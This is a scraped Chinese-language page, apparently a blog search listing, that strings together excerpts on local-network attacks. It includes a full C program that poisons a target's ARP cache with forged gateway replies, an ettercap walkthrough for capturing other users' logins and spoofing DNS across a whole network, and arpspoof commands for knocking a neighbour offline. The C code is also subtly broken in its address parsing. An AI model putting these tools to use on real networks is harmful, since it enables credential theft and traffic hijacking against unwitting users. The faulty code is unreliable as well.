精华内容
下载资源
问答
  • 局域网攻击

    千次阅读 2018-11-30 18:52:37
    局域网内的欺骗攻击主要有以下几种: ARP欺骗 DNS欺骗 NetBIOS名称欺骗和LLMNR欺骗 进行内网攻击的第一步是先查看我们自己网卡的配置信息,从而得知内网网段的信息。 探测内网信息 查看自己网卡配置信息有好多...

    目录

    探测内网信息

    ARP欺骗

    DNS欺骗

    NetBIOS名称欺骗和LLMNR欺骗 

    系统漏洞攻击


    局域网内的欺骗攻击主要有以下几种:

    • ARP欺骗
    • DNS欺骗
    • NetBIOS名称欺骗和LLMNR欺骗

    进行内网攻击的第一步是先查看我们自己网卡的配置信息,从而得知内网网段的信息。

    探测内网信息

    查看自己网卡配置信息有好多命令,常用的有下面几个,我们主要是查看ip、子网掩码和网关信息

    nmcli device show
    ifconfig
    ip address

    知道了内网所在的网段后,我们就可以探测内网中在线的主机了。

    fping   -asg   10.96.10.0/24  #这样命令只列出内网中在线的主机的ip

    或者我们可以使用 nmap 或者其他工具,获得内网中在线主机的ip和MAC地址。

    nmap -sn 10.96.10.0/24

     或者利用python脚本扫描,传送门——> Python脚本扫描给定网段的MAC地址表(scapy或 python-nmap)

     我们还可以使用命令查看存活主机中哪些是Windows系统的,并将其NetBIOS Name 和MAC扫出来

    nbtscan -r 10.96.10.0/24

    ARP欺骗

    更多的关于ARP欺骗和ARP协议,传送门——> ARP协议和ARP欺骗

    DNS欺骗

    更多的关于DNS欺骗,传送门——>DNS欺骗

    NetBIOS名称欺骗和LLMNR欺骗 

    更多的关于NetBIOS名称欺骗和LLMNR欺骗,传送门——> NetBIOS名称欺骗和LLMNR欺骗

    系统漏洞攻击

    我们可以探测局域网内其他主机是否存在一些系统漏洞,比如MS17_010,MS08_067这种漏洞,关于怎么探测漏洞,以及漏洞的利用,传送门——>Metasploit Framework(MSF)的使用

    展开全文
  • 局域网攻击软件Ettercap中文说明
  • ARP局域网攻击

    千次阅读 2014-10-13 23:48:15
    /*linux 、unix 下简单的ARP局域网攻击 */         p style="text-align: left;">#include#include#include#include#include#include#include#include#define ARP_LEN 30 //ARP帧头字节数void...

    /*linux 、unix 下简单的ARP局域网攻击 */

     

     

     

    #include<string.h>
    #include<unistd.h>
    #include<stdlib.h>
    #include<net/if_arp.h>
    #include<net/ethernet.h>
    #include<sys/types.h>
    #include<sys/socket.h>
    #define ARP_LEN 30 //ARP帧头字节数
    void mac_str( char *mac, char *buf )
    {
    sscanf(mac, "%x:%x:%x:%x:%x:%x", buf, buf+1, buf+2, buf+3, buf+4, buf+5);
    }
    void ip_str( char *ip, char *buf )
    {
    sscanf(ip, "%d.%d.%d.%d", buf, buf+1, buf+2, buf+3);
    }
    void encapsulate_frame( char *dest_mac, char *source_mac, unsigned int type, char *buf )
    {
    mac_str(dest_mac, buf);
    mac_str(source_mac, buf+6);
    *(short *)(buf+12) = htons(type);
    }
    void encapsulate_arp( unsigned short ar_op, char *source_mac, char *source_ip, char *dest_mac, char *dest_ip, char *buf )
    {
    struct arphdr parp;
    parp.ar_hrd = htons(ARPHRD_ETHER);
    parp.ar_pro = htons(ETHERTYPE_IP);
    parp.ar_hln = 6;
    parp.ar_pln = 4;
    parp.ar_op = htons(ar_op);
    memcpy(buf, &parp, sizeof(struct arphdr));
    char addr_buf[20];
    mac_str(source_mac, addr_buf);
    ip_str(source_ip, addr_buf + 6);
    mac_str(dest_mac, addr_buf + 10);
    ip_str(dest_ip, addr_buf + 16);
    memcpy(buf + sizeof(struct arphdr), addr_buf, 20);
    }
    int open_packet_socket( void )
    {
    int sock_fd;
    if( (sock_fd = socket(AF_INET, SOCK_PACKET, htons(0x0003)) ) < 0 )
    {
    perror("Create socket error.\n");
    exit(-1);
    }
    return sock_fd;
    }
    int main( int argc, char **argv )
    {
    char *source_ip = "192.168.1.1"; //172.19.10.111
    char *source_mac = "00-0c-29-6c-2e-6f"; // 172.19.10.110
    char *dest_ip = "192.168.1.223";
    char *dest_mac = "00:26:c7:4e:0b:2e";
    char *buf = (char *)malloc(sizeof(struct ether_header) + ARP_LEN);
    encapsulate_frame(dest_mac, source_mac, ETHERTYPE_ARP, buf);
    encapsulate_arp(ARPOP_REPLY, source_mac, source_ip, dest_mac, dest_ip, buf+sizeof(struct ether_header));
    int sock_fd = open_packet_socket();
    int i;
    struct sockaddr to;
    bzero( &to, sizeof(struct sockaddr) );
    to.sa_family = AF_INET;
    strcpy(to.sa_data, "p3p1");
    for(i=0; i<100000; i++)
    {
      sendto(sock_fd, buf, 44, 0, &to, sizeof(struct sockaddr));
    sleep(2);
    printf("i : %d \n",i);
    }
    return 0;
    }


    展开全文
  • 目录局域网内的欺骗攻击主要有以下几种:ARP欺骗DNS欺骗NetBIOS名称欺骗和LLMNR欺骗进行内网攻击的第一步是先查看我们自己网卡的配置信息,从而得知内网网段的信息。探测内网信息查看自己网卡配置信息有好多命令,...

    目录

    局域网内的欺骗攻击主要有以下几种:

    ARP欺骗

    DNS欺骗

    NetBIOS名称欺骗和LLMNR欺骗

    进行内网攻击的第一步是先查看我们自己网卡的配置信息,从而得知内网网段的信息。

    探测内网信息

    查看自己网卡配置信息有好多命令,常用的有下面几个,我们主要是查看ip、子网掩码和网关信息

    nmcli device show

    ifconfig

    ip address

    知道了内网所在的网段后,我们就可以探测内网中在线的主机了。

    fping   -asg   10.96.10.0/24 #这样命令只列出内网中在线的主机的ip

    或者我们可以使用 nmap 或者其他工具,获得内网中在线主机的ip和MAC地址。

    nmap -sn 10.96.10.0/24

    我们还可以使用命令查看存活主机中哪些是Windows系统的,并将其NetBIOS Name 和MAC扫出来

    nbtscan -r 10.96.10.0/24

    ARP欺骗

    更多的关于ARP欺骗和ARP协议,传送门——> ARP协议和ARP欺骗

    DNS欺骗

    更多的关于DNS欺骗,传送门——>DNS欺骗

    NetBIOS名称欺骗和LLMNR欺骗

    更多的关于NetBIOS名称欺骗和LLMNR欺骗,传送门——> NetBIOS名称欺骗和LLMNR欺骗

    系统漏洞攻击

    我们可以探测局域网内其他主机是否存在一些系统漏洞,比如MS17_010,MS08_067这种漏洞,关于怎么探测漏洞,以及漏洞的利用,传送门——>Metasploit Framework(MSF)的使用

    展开全文
  • 嗅探欺骗之Ettercap局域网攻击

    千次阅读 2018-07-14 17:58:03
    嗅探欺骗 ——Ettercap局域网攻击 最近在练习使用ettercap工具,下面来介绍一下用ettercap实施嗅探以及欺骗的实验过程。嗅探: 首先,我们把虚拟机作为攻击者,物理机作为受害者。①在虚拟机中打开一个终端,输入...

    嗅探欺骗

                                               ——Ettercap局域网攻击

            最近在练习使用ettercap工具,下面来介绍一下用ettercap实施嗅探以及欺骗的实验过程。

    嗅探:

           首先,我们把虚拟机作为攻击者,物理机作为受害者。①在虚拟机中打开一个终端,输入命令ettercap -G打开ettercap的图形化界面。②选择sniff —>unified sniffing ,网卡选择eth0 ③然后点击hosts—>scan for hosts ,再选择hosts—> hosts list ④将路由器IP设为target1,受害者IP设为target2 ⑤选择start-->start sniffing 到了这一步已经成功地实施欺骗。

           上述准备工作完成,我们在物理机随便打开一个要求输入登录账户密码的网页,输入后,返回ettercap的图形化界面,我们可以清晰地看到我们所输入的账号,密码,以及登陆的网址都被记录了下来。

    欺骗:

           执行欺骗前首先要知道ettercap中dns配置文件的位置,kali linux中目录为etc/ettercap而BT5中是在目录 /user/local/share/ettercap下。

    开始操作,直接上图把,简洁直观:

    回车,


    上图中的000.000.000.000是凑数用的,可自行设置。完成后,按住Ctrl+o键,保存。

           在终端中执行命令ettercap -T -q -i eth0 -P dns_spoof /// ///(解释: –T是文本模式 –q 是安静模式 –i 指定网卡,后面两套三个斜杠意思是全网段欺骗。)到了这一步,实验就接近尾声了,用物理机测试一下访问一个网站看看是不是被转到了指定网址了呢。

          小菜鸟一枚,欢迎各路大牛指正。本文仅用于学习交流,不要触碰网络安全的红线。

    展开全文
  • ------如何用cmd进行一次局域网攻击-------- e… 开头不知道咋写 这次写的也比较匆忙… 将就看吧 ((((((((正文部分))))))))) net use \\被攻击ip\c$ 密码 没有为空 /user:administaor 连接到默认共享、 copy 病毒...
  • recton3.0局域网攻击工具.rar 最新汉化破解版
  • 安全科普:局域网攻击的常见方法

    千次阅读 2017-04-01 14:02:34
    在我们介绍接下来的局域网实战之前,还得说说arp协议,因为接下来的几个局域网攻击手段跟arp协议有很大关系。 ARP协议 一台主机和另一台主机通信,要知道目标的IP地址,但是在局域网中传输数据的网卡却不能...
  • 简单的局域网攻击(ARP攻击)@[LingOVO] #实验环境:kali linux,windows 10 ARP攻击原理 原理分为两部分即双向欺骗 第一部分:攻击者伪造网关mac地址发送arp包给被攻击者,使得被攻击者以为攻击者是网关 第二部分...
  • 渗透学习(3)局域网攻击

    万次阅读 多人点赞 2017-12-29 20:46:58
    此为局域网断网攻击 1)查看自己的IP地址,记住默认网关 2)扫描局域网中的IP fping -asg 10.62.84.0/24 3)使用arpspoof进行断网攻击 arpspoof -i 网卡 -t 目标ip 网关 eth0为你的网卡
  • 局域网攻击演示 (1)信息收集 1对局域网进行主机发现扫描: nmap -sP 192.168.183.0/24 2确定攻击目标:本机ip地址为129,内网中还存在另一台主机,ip为134,这就是我们的目标,我们对它进一步扫描。 nmap -...
  • 我怀疑我经常只能上QQ,不能上网就是这个原因引起的,请哪位大侠指点下,追踪不到攻击者,这种攻击局域网内,还是网外...老是受到这种攻击,见附图,攻击者IP不变,而MAC值确是变动的。我怀疑我经常只能上QQ,不能...
  • 局域网攻击之给你的小伙伴断个网

    千次阅读 2016-11-11 21:11:36
    利用arpspoof这个工具我们可以进行局域网攻击,今天给大家介绍如何切断你局域网里的小伙伴的网络。 首先我们要找到局域网里的存活主机,kali里可以输入:fping asg 192.168.1.0/24 来寻找或者我们用自己编写的工具来...
  • 大致原理: ...如果我们的攻击机伪造成别的MAC地址,即可欺骗主机或者局域网网关的arp缓存表,他们发送信息即会发送到攻击机上,攻击机就会截获中间的数据,从而实现arp欺骗。 具体操作: 打开kali ...
  • ARP攻击的局限性:ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行。无法对外网(互联网、非本区域内的局域网)进行攻击。操作环境在虚拟机中完成(两个都是kali系统):AttkaliVimkali目标机器 VimIP:192....
  • 局域网攻击ettercap 详解(dns 欺诈)

    千次阅读 2018-08-17 23:19:46
    ettercap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。... ettercap是一款现有流行的网络抓包软件,它利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击,在目标与服务...
  • 转:http://jingyan.baidu.com/article/215817f7e7d0b91eda1423d2.html
  • ARP攻击的根本就是伪装被请求的IP,因为ARP是广播,所以同网段的电脑都可以收到这个广播包,所以也限制了这个攻击只可以在局域网内实现, ARP防御 那么我们怎么进行ARP攻击的防御呢? 首先我们可以直接设置ARP静态...
  • PPPOE攻击前言大家可能对PPPOE不是很熟悉,但是肯定对拨号上网非常熟悉,拨号上网就是用的这种通信协议。一般PPPOE认证上网主要用于校园网或者小区网中,拨号界面如下图所示。 但是PPPOE这种通信协议,是有一些安全...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,958
精华内容 783
关键字:

局域网攻击